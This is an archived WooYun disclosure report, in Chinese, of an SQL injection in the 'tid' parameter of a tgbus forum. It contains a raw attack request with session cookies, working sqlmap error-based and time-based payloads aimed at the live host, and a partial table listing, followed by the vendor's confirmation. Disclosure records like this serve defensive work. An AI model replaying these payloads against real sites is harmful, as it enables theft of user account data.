乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-26: 细节已通知厂商并且等待厂商处理中 2015-03-27: 厂商已经确认,细节仅向厂商公开 2015-04-06: 细节向核心白帽子及相关领域专家公开 2015-04-16: 细节向普通白帽子公开 2015-04-26: 细节向实习白帽子公开 2015-05-11: 细节向公众公开
电玩巴士某漏洞可导致四百多万用户账户密码信息泄露
POST /forum.php?action=reply&extra=page%3D1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1Content-Length: 26Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://dou.tgbus.comCookie: 7yB8_2132_saltkey=DctRkTCr; 7yB8_2132_lastvisit=1427287580; 7yB8_2132_sid=F55R5J; 7yB8_2132_lastact=1427296340%09member.php%09logging; 7yB8_2132_forum_lastvisit=D_105_1427291190D_435_1427291194D_225_1427291204D_495_1427291212D_212_1427291221D_50_1427291269D_40_1427291300D_242_1427296340; 7yB8_2132_visitedfid=242D39D484D40D50D467D486D441D222D475; 7yB8_2132__refer=%252Fhome.php%253Fac%253Dfriend%2526handlekey%253Daddfriendhk_15119828%2526mod%253Dspacecp%2526op%253Dadd%2526uid%253D15119828; 7yB8_2132_home_diymode=1; 7yB8_2132_sendmail=1; 7yB8_2132_fid39=1427291183; 7yB8_2132_fid242=1427291238; 7yB8_2132_fid40=1427291264Host: dou.tgbus.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*formhash=1094aa0f&subject=
参数tid存在注入漏洞
sqlma获得数据库信息如下:
---Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/' AND (SELECT 3666 FROM(SELECT COUNT(*),CONCAT(0x7170717171,(SELECT (CASE WHEN (3666=3666) THEN 1 ELSE 0 END)),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GYHb'='GYHb'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/ Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/-9717' OR 2709=SLEEP(5) AND 'MOVQ'='MOVQ'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/---web application technology: PHP 5.4.28back-end DBMS: MySQL 5.0available databases [3]:[*] information_schema[*] test[*] tgbus_dou_x2sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---
有241个表 部分内容如下:
---Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/' AND (SELECT 3666 FROM(SELECT COUNT(*),CONCAT(0x7170717171,(SELECT (CASE WHEN (3666=3666) THEN 1 ELSE 0 END)),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GYHb'='GYHb'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/ Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/-9717' OR 2709=SLEEP(5) AND 'MOVQ'='MOVQ'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/---web application technology: PHP 5.4.28back-end DBMS: MySQL 5.0Database: tgbus_dou_x2[241 tables]+------------------------------------+| pre_baidusubmit_setting || pre_baidusubmit_sitemap || pre_baidusubmit_urlstat || pre_common_addon || pre_common_admincp_cmenu || pre_common_admincp_group || pre_common_admincp_member || pre_common_admincp_perm || pre_common_admincp_session || pre_common_admingroup || pre_common_adminnote || pre_common_advertisement || pre_common_advertisement_custom |
pre_common_member 表存在大量用户账户信息
约400多万用户账户密码信息这里仅做证明只列出1条信息 然后终止了SQLMAP程序 点到即止 并未深入!
1、鉴于可导致泄露信息量过大,恳请给20RANK 可好?挖洞不易!愿意继续免费挖洞 协助网站安全 2、对参数tid严格过滤!
危害等级:高
漏洞Rank:12
确认时间:2015-03-27 11:06
感谢白帽"netwind"的热心指正.已确认该漏洞是论坛程序的一些不严谨过滤规则导致.已递交修复.十分感谢.
暂无